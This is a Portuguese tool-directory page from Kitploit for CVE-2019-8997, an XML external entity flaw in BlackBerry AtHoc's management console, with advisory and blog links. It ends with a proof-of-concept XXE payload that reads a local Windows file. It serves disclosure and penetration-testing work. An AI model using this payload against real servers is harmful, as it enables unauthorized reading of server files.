Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2019-8997 — Uma vulnerabilidade de Injeção de Entidade Externa XML (XXE) no Sistema de Gerenciamento (console) do BlackBerry AtHoc em versões anteriores a 7.6 HF-567 poderia permitir que um atacante lesse potencialmente arquivos locais arbitrários do servidor de aplicações ou fizesse solicitações na rede ao inserir XML maliciosamente criado em um campo existente. | Kitploit
Ferramentas/GitHubGitHub/nxkennedy/cve-2019-8997
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubnxkennedy/cve-2019-8997

CVE-2019-8997

Ver Repositório
223há 6 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

Uma vulnerabilidade de Injeção de Entidade Externa XML (XXE) no Sistema de Gerenciamento (console) do BlackBerry AtHoc em versões anteriores a 7.6 HF-567 poderia permitir que um atacante lesse potencialmente arquivos locais arbitrários do servidor de aplicações ou fizesse solicitações na rede ao inserir XML maliciosamente criado em um campo existente.

Compartilhar

CVE-2019-8997

Uma vulnerabilidade de Injeção de Entidade Externa XML (XXE) no Sistema de Gerenciamento (console) do BlackBerry AtHoc em versões anteriores a 7.6 HF-567 poderia permitir que um atacante lesse potencialmente arquivos locais arbitrários do servidor de aplicação ou fizesse solicitações na rede ao inserir XML maliciosamente elaborado em um campo existente.

Reportado Por

Nolan B. Kennedy (nxkennedy)

Aviso de Segurança

http://support.blackberry.com/kb/articleDetail?articleNumber=000047227
https://nvd.nist.gov/vuln/detail/CVE-2019-8997

Publicação no Blog

https://www.nolanbkennedy.com/feed/xxe-vulnerability-blackberry-athoc
https://www.mindpointgroup.com/blog/pen-test/xxe-vulnerability-in-blackberry-athoc-networked-crisis-communication-platform/

Prova de Conceito do Exploit

root@kitploit:~
<!DOCTYPE doc [
<!ELEMENT doc ANY > 
<!ENTITY foo SYSTEM "file:///c:/windows/win.ini">
]>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
version="1.0">
<xsl:output method="html" />
<xsl:template match="/">

<doc>&foo;</doc>

<head></head>
<body style="margin: 0; padding: 0;" oncontextmenu="return
false;"></body>
</xsl:template>
</xsl:stylesheet>
Baixar ferramenta